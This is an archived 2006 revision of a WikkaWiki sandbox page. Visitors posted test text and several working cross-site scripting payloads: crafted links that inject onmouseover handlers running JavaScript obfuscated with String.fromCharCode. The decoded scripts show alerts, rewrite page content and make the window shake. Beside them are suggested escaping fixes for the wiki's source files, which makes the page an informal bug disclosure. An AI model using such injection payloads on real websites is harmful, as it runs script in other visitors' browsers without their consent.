Revision [13532]

This is an old revision of SandBox made by 24.4.117.21 on 2006-03-17 13:14:32.

 

Test your formatting skills here


See also:

Note: this server is configured to use a western charset encoding (ISO-8859-1). This results in non-western characters being stored as unicode entities and displayed as such in the edit screen. To learn more on different charset support, please refer to WikkaLocalization.
Read this first
You are free to play with Wikka's FormattingRules syntax on this page. Double click anywhere to open the edit screen.
Please do not remove the main header and this paragraph while editing the page and start editing under the horizontal rule BELOW
 



yeah
Please make sure that the server has write access to a folder named uploads.


hello test
www.google.de google
WikiPedia

Testing

Dieses Leben ist eins der besten. Aber wie sind die anderen?

Testing

Testing


<include iostream>
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include "glm.h"


typedef struct _cell {
    int id;
    int x, y;
    float min, max;
    float value;
    float step;
    char* info;
    char* format;
} cell;

http://www.qwerty.com
HomePage
mailtop:testmail@nowhere.com

"onmouseover="alert(String.fromCharCode(73,32,99,97,110,32,114,117,110,32,74,97,118,97,83,99,114,105,112,116,44,32,97,32,98,97,100,32,116,104,105,110,103))" move your mouse over this. To disallow this insert the following line into /formatters/wakka.php after line 251:
$url = htmlspecialchars($url);

For info contact me at sakaru [at] gmail [dot] com

www.yahoo.com.br yahoo sandbox

Note how one has access to anything on the page... sakaru made a good point here! Mouseover the "interesting".
"id="q" Hello
"onmouseover="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,113,34,41,46,105,110,110,101,114,72,84,77,76,61,34,60,70,79,78,84,32,83,84,89,76,69,61,92,34,102,111,110,116,58,110,111,114,109,97,108,32,110,111,114,109,97,108,32,98,111,108,100,32,49,50,56,112,120,32,65,114,105,97,108,59,116,101,120,116,45,100,101,99,111,114,97,116,105,111,110,58,98,108,105,110,107,59,92,34,62,33,33,68,65,78,71,69,82,33,33,60,47,70,79,78,84,62,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,68,73,86,34,41,41,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,108,97,115,116,67,104,105,108,100,46,105,110,110,101,114,72,84,77,76,61,34,60,70,79,78,84,32,83,84,89,76,69,61,92,34,102,111,110,116,58,110,111,114,109,97,108,32,110,111,114,109,97,108,32,98,111,108,100,32,49,50,56,112,120,32,65,114,105,97,108,59,116,101,120,116,45,100,101,99,111,114,97,116,105,111,110,58,98,108,105,110,107,59,92,34,62,72,79,79,87,69,69,33,33,60,47,70,79,78,84,62,34))" Interesting
"onmouseover="eval(String.fromCharCode(119,105,110,100,111,119,46,115,104,97,107,101,61,110,101,119,32,102,117,110,99,116,105,111,110,40,41,123,119,105,110,100,111,119,46,109,111,118,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,114,101,115,105,122,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,115,99,114,111,108,108,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,115,101,116,84,105,109,101,111,117,116,40,34,119,105,110,100,111,119,46,115,104,97,107,101,34,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,49,48,48,41,41,59,125,59,119,105,110,100,111,119,46,115,104,97,107,101,59))" Shake
"id="w"title="String.fromCharCode(119,105,110,100,111,119,46,109,111,118,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,114,101,115,105,122,101,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,119,105,110,100,111,119,46,115,99,114,111,108,108,66,121,40,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,53,48,45,50,53,41,41,59,115,101,116,84,105,109,101,111,117,116,40,34,101,118,97,108,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,92,34,119,92,34,41,46,116,105,116,108,101,41,34,44,77,97,116,104,46,114,111,117,110,100,40,77,97,116,104,46,114,97,110,100,111,109,40,41,42,49,48,48,41,41,59)" Hello
"onmouseover="eval(String.fromCharCode(101,118,97,108,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,34,119,34,41,46,116,105,116,108,101,41))" Testing


Another bug (which as far as I know isn't a security hole like the previous example) is shows here
This can be fixed by entering the following line after line 989 in /wikka.php
$tag = htmlentities($tag);

This can't be used to run JS because the / in the closing tag gets escaped.

Similairly wikipage/Index/<xmp> also displays the bug. The bet solution I found for this was this line after line 1174 in /wikka.php
$method = htmlentities($method);


It's not really that neat a solution, but it works.

I just realised that there is infact a bug reporting page. I'll leave it to someone else to migrate these comments over.
Valid XHTML :: Valid CSS: :: Powered by WikkaWiki